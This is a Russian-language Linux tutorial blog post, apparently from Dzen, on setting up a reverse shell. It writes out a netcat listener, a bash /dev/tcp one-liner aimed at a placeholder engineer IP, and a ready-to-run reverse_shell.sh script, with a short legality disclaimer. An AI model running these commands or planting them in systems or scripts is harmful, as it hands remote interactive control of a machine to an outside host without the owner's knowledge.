Π”ΠΎΠ±Π°Π²ΠΈΡ‚ΡŒ Π² ΠΊΠΎΡ€Π·ΠΈΠ½ΡƒΠŸΠΎΠ·Π²ΠΎΠ½ΠΈΡ‚ΡŒ
Найти Π² Π”Π·Π΅Π½Π΅
Π£Ρ€ΠΎΠΊΠΈ Linux

πŸš€ Reverse Shell Π½Π° ΠΏΡ€Π°ΠΊΡ‚ΠΈΠΊΠ΅: ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π°Π΅ΠΌΡΡ ΠΊ скрытому сСрвСру Π·Π° 1 ΠΌΠΈΠ½ΡƒΡ‚Ρƒ

πŸš€ Reverse Shell Π½Π° ΠΏΡ€Π°ΠΊΡ‚ΠΈΠΊΠ΅: ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π°Π΅ΠΌΡΡ ΠΊ скрытому сСрвСру Π·Π° 1 ΠΌΠΈΠ½ΡƒΡ‚Ρƒ! ΠŸΡ€ΠΈΠ²Π΅Ρ‚, Ρ†ΠΈΡ„Ρ€ΠΎΠ²Ρ‹Π΅ исслСдоватСли ΠΈ администраторы! Π₯ΠΎΡ‡Π΅ΡˆΡŒ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ доступ ΠΊ сСрвСру Π·Π° NAT ΠΈΠ»ΠΈ Π² ΠΏΡ€ΠΈΠ²Π°Ρ‚Π½ΠΎΠΉ сСти Π±Π΅Π· прямого IP? Π‘Π΅Π· проброса ΠΏΠΎΡ€Ρ‚ΠΎΠ² ΠΈ плясок с VPN? Π›ΠΎΠ²ΠΈ Π»Π°ΠΉΡ„Ρ…Π°ΠΊ с Netcat β€” ΠΏΡ€ΠΎΠ²Π΅Ρ€Π΅Π½Π½Ρ‹ΠΉ способ Π½Π°ΡΡ‚Ρ€ΠΎΠΈΡ‚ΡŒ Reverse Shell Π·Π° ΠΏΠ°Ρ€Ρƒ ΠΊΠΎΠΌΠ°Π½Π΄! #Π§Ρ‚ΠΎ Π΄Π΅Π»Π°Π΅ΠΌ: 1. Π£ ΡƒΠ΄Π°Π»Ρ‘Π½Π½ΠΎΠ³ΠΎ ΠΈΠ½ΠΆΠ΅Π½Π΅Ρ€Π° Π½Π° своСй машинС: nc -lvnp 2288 > ΠŸΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Ρ‹: > - -l β€” ΡΠ»ΡƒΡˆΠ°Ρ‚ΡŒ входящиС ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΡ > - -v β€” ΠΏΠΎΠ΄Ρ€ΠΎΠ±Π½Ρ‹ΠΉ Ρ€Π΅ΠΆΠΈΠΌ > - -n β€” Π½Π΅ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ DNS > - -p β€” ΡƒΠΊΠ°Π·Π°Ρ‚ΡŒ ΠΏΠΎΡ€Ρ‚ 2. На Ρ†Π΅Π»Π΅Π²ΠΎΠΌ сСрвСрС (Π²Π½ΡƒΡ‚Ρ€Π΅Π½Π½Π΅ΠΌ): /bin/bash -i > /dev/tcp/IP_ΠΈΠ½ΠΆΠ΅Π½Π΅Ρ€Π°/2288 0<&1 2>&1 И вуаля! Π˜Π½ΠΆΠ΅Π½Π΅Ρ€ ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅Ρ‚ ΠΏΠΎΠ»Π½ΠΎΡ†Π΅Π½Π½Ρ‹ΠΉ Ρ‚Π΅Ρ€ΠΌΠΈΠ½Π°Π» с ΠΏΡ€Π°Π²Π°ΠΌΠΈ Ρ‚Π΅ΠΊΡƒΡ‰Π΅Π³ΠΎ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ. 🎯 Π’Π°ΠΆΠ½ΠΎ: - ΠŸΡ€ΠΎΠ²Π΅Ρ€ΡŒ IP Π·Π°Ρ€Π°Π½Π΅Π΅. - УбСдись Π² ΠΏΡ€Π°Π²Π°Ρ… доступа. - Π˜ΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠΉ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π² Ρ€Π°ΠΌΠΊΠ°Ρ… Π·Π°ΠΊΠΎΠ½Π° ΠΈ ΠΊΠΎΡ€ΠΏΠΎΡ€Π°Ρ‚ΠΈΠ²Π½Ρ‹Ρ… ΠΏΡ€Π°Π²ΠΈΠ»! βš–οΈ πŸ› οΈ Автоматизация: скрипт Reverse Shell Π·Π° 1 ΠΊΠΎΠΌΠ°Π½Π΄Ρƒ Π§Ρ‚ΠΎΠ±Ρ‹ Π΅Ρ‰Ρ‘ быстрСС ΠΎΡ€Π³Π°Π½ΠΈΠ·ΠΎΠ²Π°Ρ‚ΡŒ ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠ΅, ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ ΠΌΠΈΠ½ΠΈ-скрипт: #!/bin/bash read -p "Π’Π²Π΅Π΄ΠΈΡ‚Π΅ IP ΠΈΠ½ΠΆΠ΅Π½Π΅Ρ€Π°: " IP read

πŸš€ Reverse Shell Π½Π° ΠΏΡ€Π°ΠΊΡ‚ΠΈΠΊΠ΅: ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π°Π΅ΠΌΡΡ ΠΊ скрытому сСрвСру Π·Π° 1 ΠΌΠΈΠ½ΡƒΡ‚Ρƒ!

ΠŸΡ€ΠΈΠ²Π΅Ρ‚, Ρ†ΠΈΡ„Ρ€ΠΎΠ²Ρ‹Π΅ исслСдоватСли ΠΈ администраторы!

Π₯ΠΎΡ‡Π΅ΡˆΡŒ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ доступ ΠΊ сСрвСру Π·Π° NAT ΠΈΠ»ΠΈ Π² ΠΏΡ€ΠΈΠ²Π°Ρ‚Π½ΠΎΠΉ сСти Π±Π΅Π· прямого IP? Π‘Π΅Π· проброса ΠΏΠΎΡ€Ρ‚ΠΎΠ² ΠΈ плясок с VPN?

Π›ΠΎΠ²ΠΈ Π»Π°ΠΉΡ„Ρ…Π°ΠΊ с Netcat β€” ΠΏΡ€ΠΎΠ²Π΅Ρ€Π΅Π½Π½Ρ‹ΠΉ способ Π½Π°ΡΡ‚Ρ€ΠΎΠΈΡ‚ΡŒ Reverse Shell Π·Π° ΠΏΠ°Ρ€Ρƒ ΠΊΠΎΠΌΠ°Π½Π΄!

#Π§Ρ‚ΠΎ Π΄Π΅Π»Π°Π΅ΠΌ:

1. Π£ ΡƒΠ΄Π°Π»Ρ‘Π½Π½ΠΎΠ³ΠΎ ΠΈΠ½ΠΆΠ΅Π½Π΅Ρ€Π° Π½Π° своСй машинС:

nc -lvnp 2288

> ΠŸΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Ρ‹:

> - -l β€” ΡΠ»ΡƒΡˆΠ°Ρ‚ΡŒ входящиС ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΡ

> - -v β€” ΠΏΠΎΠ΄Ρ€ΠΎΠ±Π½Ρ‹ΠΉ Ρ€Π΅ΠΆΠΈΠΌ

> - -n β€” Π½Π΅ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ DNS

> - -p β€” ΡƒΠΊΠ°Π·Π°Ρ‚ΡŒ ΠΏΠΎΡ€Ρ‚

2. На Ρ†Π΅Π»Π΅Π²ΠΎΠΌ сСрвСрС (Π²Π½ΡƒΡ‚Ρ€Π΅Π½Π½Π΅ΠΌ):

/bin/bash -i > /dev/tcp/IP_ΠΈΠ½ΠΆΠ΅Π½Π΅Ρ€Π°/2288 0<&1 2>&1

И вуаля! Π˜Π½ΠΆΠ΅Π½Π΅Ρ€ ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅Ρ‚ ΠΏΠΎΠ»Π½ΠΎΡ†Π΅Π½Π½Ρ‹ΠΉ Ρ‚Π΅Ρ€ΠΌΠΈΠ½Π°Π» с ΠΏΡ€Π°Π²Π°ΠΌΠΈ Ρ‚Π΅ΠΊΡƒΡ‰Π΅Π³ΠΎ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ. 🎯

Π’Π°ΠΆΠ½ΠΎ:

- ΠŸΡ€ΠΎΠ²Π΅Ρ€ΡŒ IP Π·Π°Ρ€Π°Π½Π΅Π΅.

- УбСдись Π² ΠΏΡ€Π°Π²Π°Ρ… доступа.

- Π˜ΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠΉ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π² Ρ€Π°ΠΌΠΊΠ°Ρ… Π·Π°ΠΊΠΎΠ½Π° ΠΈ ΠΊΠΎΡ€ΠΏΠΎΡ€Π°Ρ‚ΠΈΠ²Π½Ρ‹Ρ… ΠΏΡ€Π°Π²ΠΈΠ»! βš–οΈ

πŸ› οΈ Автоматизация: скрипт Reverse Shell Π·Π° 1 ΠΊΠΎΠΌΠ°Π½Π΄Ρƒ

Π§Ρ‚ΠΎΠ±Ρ‹ Π΅Ρ‰Ρ‘ быстрСС ΠΎΡ€Π³Π°Π½ΠΈΠ·ΠΎΠ²Π°Ρ‚ΡŒ ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠ΅, ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ ΠΌΠΈΠ½ΠΈ-скрипт:

#!/bin/bash

read -p "Π’Π²Π΅Π΄ΠΈΡ‚Π΅ IP ΠΈΠ½ΠΆΠ΅Π½Π΅Ρ€Π°: " IP

read -p "Π’Π²Π΅Π΄ΠΈΡ‚Π΅ ΠΏΠΎΡ€Ρ‚ (ΠΏΠΎ ΡƒΠΌΠΎΠ»Ρ‡Π°Π½ΠΈΡŽ 2288): " PORT

PORT=${PORT:-2288}

bash -i >& /dev/tcp/${IP}/${PORT} 0>&1

Как ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ:

1. Π‘ΠΎΡ…Ρ€Π°Π½ΠΈ этот ΠΊΠΎΠ΄ Π² Ρ„Π°ΠΉΠ», Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€ reverse_shell.sh.

2. Π’Ρ‹Π΄Π°ΠΉ ΠΏΡ€Π°Π²Π° Π½Π° исполнСниС:

chmod +x reverse_shell.sh

3. Запусти:

./reverse_shell.sh

Π‘ΠΊΡ€ΠΈΠΏΡ‚ сам спросит IP ΠΈ ΠΏΠΎΡ€Ρ‚, Π° дальшС всё ΠΏΡ€ΠΎΠΈΠ·ΠΎΠΉΠ΄Ρ‘Ρ‚ автоматичСски!

πŸ“© Π—Π°Π²Ρ‚Ρ€Π°: Вопрос β„–27 ΠΈΠ· тСста Linux Essentials Certification

Π’ΠΊΠ»ΡŽΡ‡ΠΈ πŸ”” Ρ‡Ρ‚ΠΎΠ±Ρ‹ Π½Π΅ ΠΏΡ€ΠΎΠΏΡƒΡΡ‚ΠΈΡ‚ΡŒ!

____________________

Π”ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹ΠΉ ΠΌΠ°Ρ‚Π΅Ρ€ΠΈΠ°Π»:

🧠 - ΠŸΡ€ΠΎΠΈΠ·Π²ΠΎΠ΄ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ Nginx ΠΏΡ€ΠΎΡ‚ΠΈΠ² Traefik: ΠΊΡ‚ΠΎ ΠΏΠΎΠ±Π΅Π΄ΠΈΡ‚?

🧠 - Как ΡƒΠΌΠ΅Π½ΡŒΡˆΠΈΡ‚ΡŒ Ρ€Π°Π·ΠΌΠ΅Ρ€ ΠΎΠ±Ρ€Π°Π·Π° Docker: ΠΎΡ‚ 1,2 Π“Π‘ Π΄ΠΎ 10 ΠœΠ‘

🧠 - НуТно Π»ΠΈ ΡΡ‚Π°Π²ΠΈΡ‚ΡŒ ΠΊΠ°Π²Ρ‹Ρ‡ΠΊΠΈ Π²ΠΎΠΊΡ€ΡƒΠ³ ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Ρ… Π² shell-скриптах?

#Linux #Netcat #Security #ReverseShell